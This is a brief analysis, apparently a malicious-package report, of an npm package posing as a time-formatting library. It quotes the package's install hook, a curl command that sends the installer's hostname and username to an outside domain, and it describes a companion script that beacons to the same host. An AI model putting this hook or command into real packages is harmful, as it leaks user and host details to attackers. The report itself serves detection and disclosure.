package.json declares a postinstall hook that runs curl http://npm.wdf1.eyes.sh/pre?h=$(hostname)&u=&(whoami) over plain HTTP on every npm install, leaking the installer's hostname and current username to a non-publisher domain. The package advertises itself as a time-formatting library and has no legitimate reason to phone home with host identifiers. A second file, scripts/postinstall.js, is shipped in the tarball and POSTs JSON {ping:'npm'} to the same host (npm.wdf1.eyes.sh) over plain HTTP, reinforcing the install-time callback. This is the canonical recon-beacon pattern used to enumerate compromised hosts before staging follow-on payloads.